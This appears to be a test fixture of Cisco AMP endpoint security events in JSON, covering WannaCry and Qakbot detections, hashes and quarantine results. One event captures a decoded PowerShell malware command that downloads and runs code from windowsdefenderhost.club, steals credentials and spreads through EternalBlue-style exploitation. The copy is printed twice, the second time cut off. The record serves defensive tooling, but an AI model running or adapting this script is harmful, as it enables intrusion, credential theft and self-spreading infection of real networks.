-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Quarantine","event_type_id":553648155,"detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell 
Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","$ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) "],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E $ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
